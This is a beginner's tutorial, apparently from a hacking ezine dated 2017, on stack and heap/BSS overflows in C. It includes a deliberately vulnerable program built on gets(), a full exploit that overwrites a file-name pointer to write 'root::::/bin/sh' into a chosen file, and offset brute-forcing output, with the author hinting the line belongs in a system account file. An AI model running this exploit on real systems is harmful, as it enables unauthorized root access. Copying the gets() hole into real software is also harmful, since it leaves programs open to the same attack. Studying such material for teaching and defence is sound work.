Exploiting Heap Overflow for Beginners -by Mohamed Ahmed.

Sep 11, 2017 07:15 PM

Something simple: overflows for nerds.

Well, here we are in front of a computer that is running a program, and we
ask ourselves, "Why does this machine work?" The truth is that explaining
exactly what the processor does is a bit complex (it took me four months of a
rock-hard course to understand it ;) but we can make a rough summary: we have
a processor that, as its name indicates, only processes the data that is in
memory (or on the hard disk, etc.). "And how does the processor know how to
process a given piece of data?" By means of preprogrammed binary codes that
tell it which instruction to execute next and which data to execute it with.
"And how does the processor know that what it is processing is data and not
another instruction of the program that it should execute?" It does not know,
and this is precisely the fact we are going to take advantage of for our evil
purposes.

Let's see: the memory of a computer, as you all know, is simply a bunch of
cells in which you can store 0s or 1s. It consists of nothing more than that.
For example, if we take a very small portion of memory and look at what it
contains, it will surely look like this:

--------------------------------------------------------------------------------------------------------

...00101001001010101111010101010001011010100011101010101010101001....

--------------------------------------------------------------------------------------------------------

and what this whole series of digits actually means is this:

--------------------------------------------------------------------------------------------------------

...00101001001010101111010101010001011010100011101010101010101001....

--------------------------------------------------------------------------------------------------------

instruction | data | data | instruction | instr ...

Since the time of the first computers there has been the idea of putting a
tag (one extra bit) on each group of bits to mark whether the group in
question was an instruction or data; but at that time an extra bit was quite
expensive, and programs would have produced their results much more slowly
with one more bit to process. In addition, Von Neumann (a guy to whom we owe
many of the concepts behind current computers) had shown years earlier that
with a well-organized processor and well-ordered access to memory there was
no need to differentiate between instructions and data: the processor would
fetch an instruction and then take the data indicated by that instruction,
and since the instruction would always point to the memory area where its
data lives, there was no problem.

Is it certain that the instruction will always point to the memory area where
its data lives? Well .... that is open to discussion ....

Let's look at the dumbest example of a stack overflow there is. We have a
variable (that is, one of the 'data' of an instruction) and we execute
something as simple as this little program:

code

......

main ()
{
    char data[20];

    ....

    scanf ("%s", data);

    ....
}

....

and the memory would be more or less like this (the x's represent instructions):

.... xxxx | 0000000000 ... 0000000000 | xxxxx ...... xxx | xxxxxxx ...... xxxxxxx | .....

^ ^

the variable data[20]          the scanf instruction

And just like that, the game is set up. Normally, when the user is asked to
enter the text that fills the variable data[20], they enter fewer than 20
characters and there is no problem; the problem appears when they decide to
enter a few more. It turns out that the C language does not check bounds when
executing calls like this one, so it simply keeps accepting characters and
storing them in the memory locations adjacent to data[20], more or less like
this:

Case 1:

the user is a nice person

----------------------------------------------------------------------------------

..... I am med0000000000000 | xxxxxxxxxxxxx ... xxxx | .....

----------------------------------------------------------------------------------

Case 2:

the user is a "hackerrr" wanting to do something illegal

----------------------------------------------------------------------------------

..... I am a mohamed jaj | ajajajaxxxxxxxx ... xx | .....

----------------------------------------------------------------------------------

In case 2 we can see how the first bytes of the instruction that follows
data[20] have been overwritten. What normally happens in these cases is that
the processor, on trying to execute that instruction, which of course no
longer matches any valid one, raises an error and the program is terminated.
The trick, however, is to overwrite the instruction that follows data[20]
with something the processor understands. Most commonly it is overwritten
with a jump to another memory location where we have previously placed a call
to a shell so that, instead of the original instruction, a shell is executed
that gives us access to the system.

Graphically:

........................................................

................ data[20] jump xxxxxxxx ................

........................................................

........................................................

........................................................

shell

and the program will finish its execution with a brand-new, freshly invoked
shell :).

Well, I will not dwell on the subject of stack overflows; I suppose you all
got the idea. Everything I have said so far refers to stack overflows, about
which there are plenty of articles written in both Spanish and Yankee-speak,
so if you are interested, you just have to look around a bit ... (and not
far, this ezine carries them all ;)

Heap overflows.

In the previous paragraphs we have seen the basics of a stack overflow. It is
not very complex, but it has certain quirks that must be taken into account,
such as finding return addresses in function calls and things like that (to
learn more, the best thing is to read the various articles published on the
subject). I favor heap overflows for their simplicity and their "purity of
lines", as some bad car advertisement would say. ;)

Of course, to understand what a heap overflow is, the first thing to know is
what the heap is ;). Let's see: a program has two ways of asking the OS for
the memory it needs to do its job. One of them is the typical one, which we
used before:

char data[20];

so the system allocates a memory zone, identifying it with the name "data"
and a size of 20 bytes. This is the traditional, "static" form; that is, if
at some point in the program we need the variable data to be 40 bytes, we
cannot do it.

The other way, and the one that interests us, is for the program to ask at
run time (the other form is fixed "at compile time") for the memory it needs;
the OS then searches for free memory and, if any is available, gives it to
the program. Usually this is done with:

Code:

char * data;

data = (char *) malloc (SIZEofMEMORY);

and the system returns the allocated memory zone in "data" or, if there is
none free, sets data to NULL. Here we see that the variable "data" is no
longer a variable in the "classic" sense of the word and has become a pointer
that, as its name indicates, points to the first of a series of memory
positions.

Someone should already be asking: "if an overflow consists of overwriting a
memory zone, how can the OS be so silly as to let malloc() give us a memory
zone that is already occupied?" Very simple: the OS is not silly. Well, not
quite :). The OS simply does what we tell it within limits, so it will never
hand us positions that are already in use, but nothing prevents us from
moving through those positions ourselves. What we have to take into account
is that C does not check that we are writing inside the memory positions the
OS assigned to us (if it does not check bounds on variables, it is only
logical that it does not check this either, because the two concepts boil
down to the same thing: writing to a place that was not meant for you), so we
will always be able to write to another position as long as it is a valid
one. That is, if we have two memory zones (they need not be consecutive)
allocated for two variables, the OS will let us write to the second through
the first, and vice versa, for the simple reason that both point to areas of
memory that have been marked as "writable" for that kind of variable. Let's
see it with a very clear example:

code

<++> heap/example1.c 92ca44fdc06aa8f1d800ecf7fe6309

/*
 * the simplest possible example of an overflow in the heap zone,
 * based directly on one from w00w00
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main ()
{
    char *data1, *data2;      /* our variables */
    unsigned long distance;   /* the actual distance in memory between
                                 our two variables. if the two zones were
                                 back to back with nothing in between,
                                 the distance would be exactly 40 */

    /* request memory allocation. Let's ask for 40 bytes each */
    data1 = (char *) malloc (40);
    data2 = (char *) malloc (40);

    /* we look at how far apart they are */
    distance = (unsigned long) data2 - (unsigned long) data1;

    /* now we fill data2 with a normal string. the only thing memset()
       does is fill the memory position it is passed with a character */
    memset (data2, 'P', 40-1), data2[40-1] = '\0';

    printf ("before overwriting: %s\n", data2);

    /* we overwrite 20 bytes of data2 using the variable data1 and the
       distance separating them (whatever it turns out to be) */
    memset (data1, '*', (unsigned int) (distance + 20));

    /* we check */
    printf ("after overwriting: %s\n", data2);

    return 0;
}

<-->

Once we have it, we execute it and see how the pointer data1 overwrites the
area assigned to data2; the OS allows it for the simple reason that both
zones (the one belonging to data2 and the one data1 is supposed to use) are
of the same type and are set up in the same way, and since C does not check
addresses, it is easy to fool it into thinking that data1 is being written in
its own place when in fact we are in data2's zone.

code

...

cafo@thehost:~/nets/heap$ ./example1

before overwriting: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

after overwriting: ********************PPPPPPPPPPPPPPPPPPP

...

So the concept is now quite clear, right? We only need one pointer in the
heap zone that we can control in order to reach everything else stored in
that zone.

Well, so much rambling about the heap zone and I still have not explained
what it is. ;) The heap is simply a zone of dynamic memory where variables
are stored by means of calls to malloc(). Those of you who have read some
book on OS architecture and the like may recognize the pair HEAP / BSS. The
BSS (and I swear I have not been able to find anywhere what those damn
initials stand for ;) is simply the memory area that holds uninitialized
global variables and those declared 'static'. For example, if we want memory
that we do not have to initialize but that behaves like the pointer we used
before, we can write something like this:

static char data1[40];

and it would be the BSS-zone equivalent of the call to malloc() that we made
in the previous little program.

Well, at this point more than one of you will be asking, "And what use is
this to me?" The truth is that if you are asking that, you still need quite a
bit of practice with exploits ;). Okay, seriously. You simply have to find
some source code (quite common in these open-source times ...) that uses one
of the variables I have described and lets the user write to it. The typical
situation is that the programmer uses one of these buffers to request data
from the user. Imagine we have a program that does nothing but write what we
tell it into a file we cannot choose. Something like this:

code

<++> heap/example2.c $d102f90f44986e093acb7a01aef6d723

/*
 * example2.c  Shows a vulnerable program in the BSS zone
 */

#include <stdio.h>

int main ()
{
    FILE *file;
    static char data1[16], *tmpfile;

    tmpfile = "/tmp/mama.txt";   /* we use any temporary file */

    printf ("before the exploit: %s\n", tmpfile);   /* to make sure... */

    printf ("Data to be entered in mama.txt:\n");
    gets (data1);   /* no bounds check: this is the hole */

    printf ("\nafter the exploit: %s\n", tmpfile);

    file = fopen (tmpfile, "w");
    fputs (data1, file);
    fclose (file);
}

<-->

Well, we now have the program in question. At first glance it is not
vulnerable, because the only thing that can be modified "externally" is what
gets written to the file "mama.txt", so we would have no problems with system
security, right? Don't count on it, because we can use what we said before
about overwriting pointers to make the program do certain undesirable things,
such as overwriting system files and the like, and we can always find files
that are useful to overwrite, right?

Well, the trick in this case is that the variable where the file name is
stored is a pointer, while the buffer where we save the data we want to put
in the file sits next to it in the BSS zone, which lets us play a little with
addresses. The only thing we have to do is start trying different addresses
for "tmpfile", written through "data1", until we manage to completely
overwrite the value of tmpfile with the address of the name of a file that we
are interested in writing. Let's look at an example:

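code

<++> heap/exploit2.c $cc2e106df958188984666213aa549c49

/*
 * exploit for the program example2.c
 * the original is still at w00w00 ;)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define ERROR -1
#define DIFF 16                  /* distance between data1 and tmpfile */
#define VULPROG "./example2"
#define VULFILE "/tmp/mierdapami"

/* returns the stack pointer (32-bit x86 only; the value is left in eax) */
u_long getesp ()
{
    __asm__ ("movl %esp,%eax");
}

int main (int argc, char **argv)
{
    u_long addr;
    int i, mainbufsize;
    char *mainbuf, buf[BUFSIZE];   /* room for text, padding and address */

    if (argc <= 1)
    {
        fprintf (stderr, "Usage: %s <offset>\n", argv[0]);
        exit (ERROR);
    }

    /* the line we want to end up in the file, followed by padding */
    memset (buf, 0, sizeof (buf)), strcpy (buf, "root::::/bin/sh\t#");
    memset (buf + strlen (buf), 'A', DIFF);

    /* guess where VULFILE will sit among the arguments of example2 */
    addr = getesp () + atoi (argv[1]);

    /* put that address where tmpfile lives, lowest byte first */
    for (i = 0; i < sizeof (u_long); i++)
        buf[DIFF + i] = ((u_long) addr >> (i * 8) & 255);

    mainbufsize = strlen (buf) + strlen (VULPROG) +
                  strlen (VULPROG) + strlen (VULFILE) + 13;

    mainbuf = (char *) malloc (mainbufsize);
    memset (mainbuf, 0, mainbufsize);

    snprintf (mainbuf, mainbufsize-1, "echo '%s' | %s %s\n",
              buf, VULPROG, VULFILE);

    system (mainbuf);

    return 0;
}

<-->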

So there we have it: a seemingly innocent program like example2 is able to
write whatever we want anywhere we have write privileges. We only have to try
different offsets until we hit the complete path:

code

...
cafo@thehost:~/nets/heap$ ./exploit2 500
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:
after the exploit: G=spanish
...

Oops, we have wandered into the area of the environment variables (didn't I
say that this kind of exploit can be really useful? ;). Let's keep trying
(this is more or less a game of Battleship, but with the advantage that we
can test millions of values per minute, right? :)

...
cafo@thehost:~/nets/heap$ ./exploit2 400
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:
after the exploit: üÿ¿
...

Whoops, we have wandered into the executable code. Too low. Miss ;)

...
cafo@thehost:~/nets/heap$ ./exploit2 450
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:
after the exploit: mple2
...

This already looks better. It is the tail of the vulnerable program's name,
so we can assume we are in argv[0], right? Still a miss.

...
cafo@thehost:~/nets/heap$ ./exploit2 465
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:
after the exploit: dapami
...

Good, good, good, this is much better. We have just found our string naming
the file we want to overwrite. HIT! Counting on our fingers, it turns out
that:

...
cafo@thehost:~/nets/heap$ ./exploit2 456
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:
after the exploit: /tmp/mierdapami
...

SUNK!!! If everything went well, we now have in our tmp directory that file
with the contents we wanted it to have. Let's see:

code

...
cafo@thehost:~/nets/heap$ cat /tmp/mierdapami
root::::/bin/sh
cafo@thehost:~/nets/heap$
...

Interesting, right? Too bad that same line was not somewhere else ... but
anyway, since this is not meant for you to do bad things, I will let you
investigate.

So far everything has gone very well. Of course, up to now we have only
worked with my own programs; that is, I knew when writing them that they
would be vulnerable. The next step would be to find out what kinds of
programs may be vulnerable, or what kinds of variables are typically
overwritten by exploits, but we will leave that for the second part of the
article ...

Greetings
